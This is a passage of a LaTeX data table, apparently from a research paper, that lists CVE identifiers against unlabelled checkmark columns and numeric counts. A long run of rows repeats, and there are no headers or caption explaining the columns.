\\ \midrule +CVE-2012-4387 & & & & & & & /checkmark & & /checkmark & /checkmark & & & & & & & 1 & 82 & & \\ \midrule +CVE-2012-4520 & /checkmark & & & & & /checkmark & /checkmark & & & /checkmark & /checkmark & & & & & /checkmark & 1 & 122 & & \\ \midrule +CVE-2012-5812 & & & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & 1 & 52 & & \\ \midrule +CVE-2012-6550 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & 1 & 132 & & \\ \midrule +CVE-2012-6662 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & /checkmark & & & 1 & 134 & & \\ \midrule +CVE-2012-6684 & & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & & 1 & 124 & & \\ \midrule +CVE-2012-6685 & /checkmark & & & & & & & & & & & /checkmark & & /checkmark & & & 1 & 134 & & \\ \midrule +CVE-2013-0256 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & 1 & 192 & & \\ \midrule +CVE-2013-0262 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 178 & & \\ \midrule +CVE-2013-0263 & /checkmark & & & & & & & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 170 & & \\ \midrule +CVE-2013-0294 & /checkmark & & & & & /checkmark & & & & & & & & & & & 1 & 104 & & \\ \midrule +CVE-2013-1607 & & & & & & & & & & & & & & & & & 3 & 32 & 34 & 32 \\ \midrule +CVE-2013-1801 & /checkmark & & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & 1 & 112 & & \\ \midrule +CVE-2013-1812 & /checkmark & & & & & & & /checkmark & & /checkmark & & /checkmark & & /checkmark & & & 1 & 146 & & \\ \midrule +CVE-2013-1879 & & & & & & /checkmark & & & & /checkmark & /checkmark & & & & & & 1 & 82 & & \\ \midrule +CVE-2013-1880 & & & & & & /checkmark & & & /checkmark & /checkmark & /checkmark & & & & & & 1 & 86 & & \\ \midrule +CVE-2013-2013 & /checkmark & & & & & & & & & /checkmark & /checkmark & & & /checkmark & & & 1 & 106 & & \\ \midrule +CVE-2013-2035 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & & 1 & 84 & & \\ \midrule +CVE-2013-2132 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & & & & & & /checkmark & 1 & 126 & & \\ \midrule +CVE-2013-2191 & /checkmark & & & & & & & /checkmark & & /checkmark & & & & & & & 1 & 172 & & \\ \midrule +CVE-2013-3300 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 122 & & \\ \midrule +CVE-2013-4002 & & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 2 & 34 & 46 & 46 \\ \midrule +CVE-2013-4111 & & & & & & & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & & 1 & 56 & & \\ \midrule +CVE-2013-4116 & /checkmark & & & & & & & & & /checkmark & & /checkmark & & /checkmark & & & 1 & 138 & & \\ \midrule +CVE-2013-4249 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & /checkmark & 1 & 126 & & \\ \midrule +CVE-2013-4353 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & & & & & & & 1 & 188 & & \\ \midrule +CVE-2013-4413 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & /checkmark & & & /checkmark & & & 1 & 118 & & \\ \midrule +CVE-2013-4477 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & /checkmark & & /checkmark & 1 & 132 & & \\ \midrule +CVE-2013-4562 & /checkmark & & & & & & & /checkmark & & /checkmark & & & & & & & 1 & 108 & & \\ \midrule +CVE-2013-4701 & /checkmark & & & & & & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & & 1 & 120 & & \\ \midrule +CVE-2013-5093 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & /checkmark & 1 & 126 & & \\ \midrule +CVE-2013-5123 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 102 & & \\ \midrule +CVE-2013-6044 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & /checkmark & 1 & 126 & & \\ \midrule +CVE-2013-6348 & & & & & & /checkmark & & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & 1 & 94 & & \\ \midrule +CVE-2013-6429 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 1 & 130 & & \\ \midrule +CVE-2013-6430 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 1 & 130 & & \\ \midrule +CVE-2013-6465 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 122 & & \\ \midrule +CVE-2013-7370 & /checkmark & & & & & & & & & & & & & & & & 1 & 96 & & \\ \midrule +CVE-2013-7397 & /checkmark & & & & & & /checkmark & & & /checkmark & & & & /checkmark & & /checkmark & 1 & 144 & & \\ \midrule +CVE-2013-7398 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & /checkmark & & & 1 & 154 & & \\ \midrule +CVE-2013-7459 & /checkmark & & & & & & /checkmark & & & /checkmark & & & & & & & 1 & 108 & & \\ \midrule +CVE-2014-0012 & /checkmark & & & & & & /checkmark & & & & /checkmark & & & & & & 2 & 108 & 138 & 138 \\ \midrule +CVE-2014-0072 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & & & & & & & 1 & 124 & & \\ \midrule +CVE-2014-0073 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & & 1 & 112 & & \\ \midrule +CVE-2014-0110 & /checkmark & & & & & & & & & /checkmark & & & & & & /checkmark & 1 & 102 & & \\ \midrule +CVE-2014-0120 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & & 1 & 120 & & \\ \midrule +CVE-2014-0121 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & & 1 & 124 & & \\ \midrule +CVE-2014-0177 & /checkmark & & & & & /checkmark & & & & /checkmark & & & & & & & 1 & 172 & & \\ \midrule +CVE-2014-0193 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 1 & 130 & & \\ \midrule +CVE-2014-0225 & /checkmark & & & & & & /checkmark & /checkmark & & /checkmark & & & & & & /checkmark & 1 & 118 & & \\ \midrule +CVE-2014-1202 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & & 1 & 96 & & \\ \midrule +CVE-2014-1402 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & & 2 & 124 & 150 & 150 \\ \midrule +CVE-2014-1403 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & & 1 & 180 & & \\ \midrule +CVE-2014-1604 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & & 1 & 112 & & \\ \midrule +CVE-2014-1830 & /checkmark & & & & & & /checkmark & & & /checkmark & & & & & & & 1 & 108 & & \\ \midrule +CVE-2014-1832 & /checkmark & & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & 1 & 112 & & \\ \midrule +CVE-2014-1858 & /checkmark & & & & & & & & & & /checkmark & & & /checkmark & & & 1 & 134 & & \\ \midrule +CVE-2014-1859 & /checkmark & & & & & & & & & & /checkmark & & & /checkmark & & & 1 & 134 & & \\ \midrule +CVE-2014-1869 & /checkmark & & & & & & /checkmark & & & & /checkmark & & & & & /checkmark & 1 & 110 & & \\ \midrule +CVE-2014-1904 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & & 1 & 128 & & \\ \midrule +CVE-2014-1932 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & /checkmark & & /checkmark & 1 & 124 & & \\ \midrule +CVE-2014-1933 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & & & & /checkmark & & /checkmark & 1 & 116 & & \\ \midrule +CVE-2014-2053 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & & /checkmark & & & & & & 1 & 192 & & \\ \midrule +CVE-2014-2235 & /checkmark & & & & & /checkmark & & & /checkmark & & /checkmark & & & & & & 1 & 112 & & \\ \midrule +CVE-2014-2525 & & & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & 1 & 56 & & \\ \midrule +CVE-2014-3007 & /checkmark & & & & & /checkmark & & /checkmark & /checkmark & & & & & /checkmark & & /checkmark & 1 & 120 & & \\ \midrule +CVE-2014-3488 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & & 1 & 128 & & \\ \midrule +CVE-2014-3506 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & & & & & & /checkmark & 1 & 190 & & \\ \midrule +CVE-2014-3511 & /checkmark & & & & & /checkmark & /checkmark & & & /checkmark & & & & & & /checkmark & 1 & 182 & & \\ \midrule +CVE-2014-3576 & & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & & 1 & 52 & & \\ \midrule +CVE-2014-3578 & /checkmark & & & & & & & & & & & & & & & /checkmark & 1 & 66 & & \\ \midrule +CVE-2014-3579 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & & 1 & 146 & & \\ \midrule +CVE-2014-3599 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 70 & & \\ \midrule +CVE-2014-3600 & /checkmark & & & & & & & & /checkmark & /checkmark & & & & & & & 1 & 138 & & \\ \midrule +CVE-2014-3625 & /checkmark & & & & & & & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 106 & & \\ \midrule +CVE-2014-3741 & /checkmark & & & & & /checkmark & /checkmark & & & /checkmark & /checkmark & & & & & & 1 & 120 & & \\ \midrule +CVE-2014-3995 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & /checkmark & 1 & 134 & & \\ \midrule +CVE-2014-4658 & /checkmark & & & & & & & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 106 & & \\ \midrule +CVE-2014-6394 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 134 & & \\ \midrule +CVE-2014-7143 & & & & & & & /checkmark & & /checkmark & & & & & & & & 2 & 44 & 46 & 46 \\ \midrule +CVE-2014-7192 & /checkmark & & & & & /checkmark & /checkmark & & & /checkmark & /checkmark & & & & & & 1 & 120 & & \\ \midrule +CVE-2014-7193 & /checkmark & & & & & & & & & /checkmark & /checkmark & & & /checkmark & & & 1 & 106 & & \\ \midrule +CVE-2014-7202 & /checkmark & & & & & & & & & /checkmark & /checkmark & & & /checkmark & & & 3 & 138 & 150 & 142 \\ \midrule +CVE-2014-7203 & /checkmark & & & & & & & & & /checkmark & & /checkmark & & /checkmark & & & 1 & 138 & & \\ \midrule +CVE-2014-7205 & /checkmark & & & & & /checkmark & /checkmark & & & /checkmark & & & & & & & 1 & 116 & & \\ \midrule +CVE-2014-8115 & /checkmark & & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & 1 & 80 & & \\ \midrule +CVE-2014-8176 & /checkmark & & & & & /checkmark & /checkmark & & & /checkmark & & & & /checkmark & & /checkmark & 1 & 120 & & \\ \midrule +CVE-2014-8650 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 102 & & \\ \midrule +CVE-2014-8681 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & & 1 & 116 & & \\ \midrule +CVE-2014-8682 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & & & 1 & 124 & & \\ \midrule +CVE-2014-8991 & /checkmark & & & & & & & & & & /checkmark & & & /checkmark & & & 1 & 134 & & \\ \midrule +CVE-2014-9130 & /checkmark & & & & & /checkmark & & /checkmark & & /checkmark & & & & & & & 1 & 116 & & \\ \midrule +CVE-2014-9682 & /checkmark & & & & & /checkmark & /checkmark & & & & & & & & & & 1 & 112 & & \\ \midrule +CVE-2014-9720 & /checkmark & & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & 1 & 116 & & \\ \midrule +CVE-2014-9721 & /checkmark & & & & & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & & & 2 & 142 & 154 & 154 \\ \midrule +CVE-2014-10068 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 134 & & \\ \midrule +CVE-2014-10077 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 134 & & \\ \midrule +CVE-2015-0206 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & /checkmark & 1 & 194 & & \\ \midrule +CVE-2015-0209 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & /checkmark & 1 & 182 & & \\ \midrule +CVE-2015-0288 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & /checkmark & & /checkmark & 1 & 188 & & \\ \midrule +CVE-2015-0838 & & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & & 1 & 124 & & \\ \midrule +CVE-2015-0846 & /checkmark & & & & & & /checkmark & & & /checkmark & & & & & & & 1 & 108 & & \\ \midrule +CVE-2015-1326 & /checkmark & & & & & & /checkmark & & & /checkmark & /checkmark & & & /checkmark & & & 1 & 178 & & \\ \midrule +CVE-2015-1782 & & & & & & & /checkmark & & & /checkmark & & & & & & & 1 & 108 & & \\ \midrule +CVE-2015-1788 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 186 & & \\ \midrule +CVE-2015-1791 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & & & & /checkmark & & /checkmark & 1 & 192 & & \\ \midrule +CVE-2015-1792 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 1 & 194 & & \\ \midrule +CVE-2015-2068 & & & & & & /checkmark & /checkmark & & /checkmark & & /checkmark & & & & & & 7 & 56 & 60 & 56 \\ \midrule +CVE-2015-2156 & /checkmark & & & & & & /checkmark & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 82 & & \\ \midrule +CVE-2015-2296 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & & 1 & 112 & & \\ \midrule +CVE-2015-2912 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & /checkmark & & & 1 & 162 & & \\ \midrule +CVE-2015-2913 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 122 & & \\ \midrule +CVE-2015-3010 & /checkmark & & & & & & & /checkmark & & /checkmark & & & & /checkmark & & & 1 & 142 & & \\ \midrule +CVE-2015-3195 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & /checkmark & & /checkmark & 1 & 196 & & \\ \midrule +CVE-2015-3196 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & & & & & & /checkmark & 1 & 126 & & \\ \midrule +CVE-2015-3220 & /checkmark & & & & & & & & & & & & & & & & 1 & 96 & & \\ \midrule +CVE-2015-3253 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & /checkmark & 1 & 126 & & \\ \midrule +CVE-2015-4053 & & & & & & & & /checkmark & & /checkmark & & & & /checkmark & & & 1 & 110 & & \\ \midrule +CVE-2015-4082 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 134 & & \\ \midrule +CVE-2015-4412 & /checkmark & & & & & /checkmark & /checkmark & & & & & & & & & & 1 & 112 & & \\ \midrule +CVE-2015-4619 & /checkmark & & & & & & & & /checkmark & /checkmark & & & & & & & 1 & 104 & & \\ \midrule +CVE-2015-4706 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & & 1 & 80 & & \\ \midrule +CVE-2015-5081 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 102 & & \\ \midrule +CVE-2015-5147 & /checkmark & & & & & & & & & & & & & & & & 1 & 64 & & \\ \midrule +CVE-2015-5159 & /checkmark & & & & & & & & & & & & & & & & 1 & 160 & & \\ \midrule +CVE-2015-5211 & & & & & & & /checkmark & /checkmark & /checkmark & & & & & & & /checkmark & 1 & 54 & & \\ \midrule +CVE-2015-5253 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 1 & 130 & & \\ \midrule +CVE-2015-5254 & /checkmark & & & & & & /checkmark & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 148 & & \\ \midrule +CVE-2015-5607 & /checkmark & & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & 1 & 116 & & \\ \midrule +CVE-2015-6748 & /checkmark & & & & & & & & & & & /checkmark & & /checkmark & & & 1 & 102 & & \\ \midrule +CVE-2015-7294 & /checkmark & & & & & /checkmark & & /checkmark & & & /checkmark & & & /checkmark & & & 1 & 150 & & \\ \midrule +CVE-2015-7314 & /checkmark & & & & & & & & & /checkmark & /checkmark & & & & & & 1 & 104 & & \\ \midrule +CVE-2015-7316 & /checkmark & & & & & & & & & & & & & /checkmark & & & 1 & 98 & & \\ \midrule +CVE-2015-7559 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 156 & & \\ \midrule +CVE-2015-7809 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & & 1 & 124 & & \\ \midrule +CVE-2015-8213 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & /checkmark & 1 & 126 & & \\ \midrule +CVE-2015-8309 & /checkmark & & & & & & & & & /checkmark & /checkmark & & & & & & 1 & 168 & & \\ \midrule +CVE-2015-8310 & /checkmark & & & & & & & & /checkmark & /checkmark & /checkmark & & & & & & 1 & 108 & & \\ \midrule +CVE-2015-8747 & /checkmark & & & & & & & & /checkmark & /checkmark & & & & & & & 1 & 104 & & \\ \midrule +CVE-2015-8748 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 134 & & \\ \midrule +CVE-2015-8814 & /checkmark & & & & & & /checkmark & & /checkmark & /checkmark & & & & & & & 1 & 112 & & \\ \midrule +CVE-2015-8968 & /checkmark & & & & & & & & & & & & & /checkmark & & & 1 & 130 & & \\ \midrule +CVE-2015-9235 & /checkmark & & & & & & & & & /checkmark & /checkmark & & & & & & 1 & 104 & & \\ \midrule +CVE-2015-9243 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & /checkmark & & & 1 & 154 & & \\ \midrule +CVE-2015-9251 & /checkmark & & & & & & /checkmark & /checkmark & & & /checkmark & /checkmark & & /checkmark & & /checkmark & 1 & 156 & & \\ \midrule +CVE-2016-0750 & /checkmark & & & & & & & & /checkmark & /checkmark & & & & & & & 1 & 72 & & \\ \midrule +CVE-2010-0684 & & & & & & /checkmark & /checkmark & /checkmark & /checkmark & & /checkmark & & & & & & 1 & 66 & & \\ \midrule +CVE-2010-2245 & & & & & & & /checkmark & /checkmark & /checkmark & & & & & & & & 3 & 22 & 104 & 50 \\ \midrule +CVE-2010-5312 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & /checkmark & & & 1 & 134 & & \\ \midrule +CVE-2011-1772 & & & & & & /checkmark & & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & 1 & 94 & & \\ \midrule +CVE-2011-1950 & & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & /checkmark & & & 1 & 58 & & \\ \midrule +CVE-2011-2732 & & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & /checkmark & 1 & 54 & & \\ \midrule +CVE-2011-3871 & & & & & & & & & & /checkmark & & & & /checkmark & & /checkmark & 1 & 104 & & \\ \midrule +CVE-2011-4104 & /checkmark & & & & & /checkmark & /checkmark & & & /checkmark & & & & & & /checkmark & 1 & 118 & & \\ \midrule +CVE-2011-4461 & /checkmark & & & & & & & & & /checkmark & /checkmark & & & & & & 1 & 104 & & \\ \midrule +CVE-2011-4838 & /checkmark & & & & & & & & /checkmark & /checkmark & /checkmark & & & & & /checkmark & 1 & 174 & & \\ \midrule +CVE-2011-5036 & /checkmark & & & & & & & & & /checkmark & & & & & & /checkmark & 1 & 102 & & \\ \midrule +CVE-2012-1109 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 70 & & \\ \midrule +CVE-2012-1176 & /checkmark & & & & & & /checkmark & /checkmark & & /checkmark & & & & /checkmark & & & 1 & 150 & & \\ \midrule +CVE-2012-2139 & /checkmark & & & & & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 1 & 122 & & \\ \midrule +CVE-2012-2417 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & /checkmark & & & 1 & 122 & & \\ \midrule +CVE-2012-3366 & /checkmark & & & & & & & & /checkmark & /checkmark & /checkmark & & & & & & 1 & 108 & & \\ \midrule +CVE-2012-3408 & /checkmark & & & & & /checkmark & & & /checkmark & & & & & & & & 1 & 108 & & \\ \midrule +CVE-2012-3458 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & & 1 & 124 & & \\ \midrule +CVE-2012-3865 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 1 & 130 & & \\ \midrule +CVE-2012-4386 & & & & & & & & & /checkmark & /checkmark & & & & & & & 1 & 74 & & \\ \midrule +CVE-2012-4387 & & & & & & & /checkmark & & /checkmark & /checkmark & & & & & & & 1 & 82 & & \\ \midrule +CVE-2012-4520 & /checkmark & & & & & /checkmark & /checkmark & & & /checkmark & /checkmark & & & & & /checkmark & 1 & 122 & & \\ \midrule +CVE-2012-5812 & & & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & 1 & 52 & & \\ \midrule +CVE-2012-6550 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & 1 & 132 & & \\ \midrule +CVE-2012-6662 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & /checkmark & & & 1 & 134 & & \\ \midrule +CVE-2012-6684 & & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & & 1 & 124 & & \\ \midrule +CVE-2012-6685 & /checkmark & & & & & & & & & & & /checkmark & & /checkmark & & & 1 & 134 & & \\ \midrule +CVE-2013-0256 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & 1 & 192 & & \\ \midrule +CVE-2013-0262 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 178 & & \\ \midrule +CVE-2013-0263 & /checkmark & & & & & & & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 170 & & \\ \midrule +CVE-2013-0294 & /checkmark & & & & & /checkmark & & & & & & & & & & & 1 & 104 & & \\ \midrule +CVE-2013-1607 & & & & & & & & & & & & & & & & & 3 & 32 & 34 & 32 \\ \midrule +CVE-2013-1801 & /checkmark & & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & 1 & 112 & & \\ \midrule +CVE-2013-1812 & /checkmark & & & & & & & /checkmark & & /checkmark & & /checkmark & & /checkmark & & & 1 & 146 & & \\ \midrule +CVE-2013-1879 & & & & & & /checkmark & & & & /checkmark & /checkmark & & & & & & 1 & 82 & & \\ \midrule +CVE-2013-1880 & & & & & & /checkmark & & & /checkmark & /checkmark & /checkmark & & & & & & 1 & 86 & & \\ \midrule +CVE-2013-2013 & /checkmark & & & & & & & & & /checkmark & /checkmark & & & /checkmark & & & 1 & 106 & & \\ \midrule +CVE-2013-2035 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & & 1 & 84 & & \\ \midrule +CVE-2013-2132 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & & & & & & /checkmark & 1 & 126 & & \\ \midrule +CVE-2013-2191 & /checkmark & & & & & & & /checkmark & & /checkmark & & & & & & & 1 & 172 & & \\ \midrule +CVE-2013-3300 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 122 & & \\ \midrule +CVE-2013-4002 & & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 2 & 34 & 46 & 46 \\ \midrule +CVE-2013-4111 & & & & & & & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & & 1 & 56 & & \\ \midrule +CVE-2013-4116 & /checkmark & & & & & & & & & /checkmark & & /checkmark & & /checkmark & & & 1 & 138 & & \\ \midrule +CVE-2013-4249 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & /checkmark & 1 & 126 & & \\ \midrule +CVE-2013-4353 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & & & & & & & 1 & 188 & & \\ \midrule +CVE-2013-4413 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & /checkmark & & & /checkmark & & & 1 & 118 & & \\ \midrule +CVE-2013-4477 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & /checkmark & & /checkmark & 1 & 132 & & \\ \midrule +CVE-2013-4562 & /checkmark & & & & & & & /checkmark & & /checkmark & & & & & & & 1 & 108 & & \\ \midrule +CVE-2013-4701 & /checkmark & & & & & & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & & 1 & 120 & & \\ \midrule +CVE-2013-5093 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & /checkmark & 1 & 126 & & \\ \midrule +CVE-2013-5123 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 102 & & \\ \midrule +CVE-2013-6044 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & /checkmark & 1 & 126 & & \\ \midrule +CVE-2013-6348 & & & & & & /checkmark & & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & 1 & 94 & & \\ \midrule +CVE-2013-6429 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 1 & 130 & & \\ \midrule +CVE-2013-6430 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 1 & 130 & & \\ \midrule +CVE-2013-6465 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 122 & & \\ \midrule +CVE-2013-7370 & /checkmark & & & & & & & & & & & & & & & & 1 & 96 & & \\ \midrule +CVE-2013-7397 & /checkmark & & & & & & /checkmark & & & /checkmark & & & & /checkmark & & /checkmark & 1 & 144 & & \\ \midrule +CVE-2013-7398 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & /checkmark & & & 1 & 154 & & \\ \midrule +CVE-2013-7459 & /checkmark & & & & & & /checkmark & & & /checkmark & & & & & & & 1 & 108 & & \\ \midrule +CVE-2014-0012 & /checkmark & & & & & & /checkmark & & & & /checkmark & & & & & & 2 & 108 & 138 & 138 \\ \midrule +CVE-2014-0072 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & & & & & & & 1 & 124 & & \\ \midrule +CVE-2014-0073 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & & 1 & 112 & & \\ \midrule +CVE-2014-0110 & /checkmark & & & & & & & & & /checkmark & & & & & & /checkmark & 1 & 102 & & \\ \midrule +CVE-2014-0120 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & & 1 & 120 & & \\ \midrule +CVE-2014-0121 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & & 1 & 124 & & \\ \midrule +CVE-2014-0177 & /checkmark & & & & & /checkmark & & & & /checkmark & & & & & & & 1 & 172 & & \\ \midrule +CVE-2014-0193 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 1 & 130 & & \\ \midrule +CVE-2014-0225 & /checkmark & & & & & & /checkmark & /checkmark & & /checkmark & & & & & & /checkmark & 1 & 118 & & \\ \midrule +CVE-2014-1202 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & & 1 & 96 & & \\ \midrule +CVE-2014-1402 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & & 2 & 124 & 150 & 150 \\ \midrule +CVE-2014-1403 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & & 1 & 180 & & \\ \midrule +CVE-2014-1604 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & & 1 & 112 & & \\ \midrule +CVE-2014-1830 & /checkmark & & & & & & /checkmark & & & /checkmark & & & & & & & 1 & 108 & & \\ \midrule +CVE-2014-1832 & /checkmark & & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & 1 & 112 & & \\ \midrule +CVE-2014-1858 & /checkmark & & & & & & & & & & /checkmark & & & /checkmark & & & 1 & 134 & & \\ \midrule +CVE-2014-1859 & /checkmark & & & & & & & & & & /checkmark 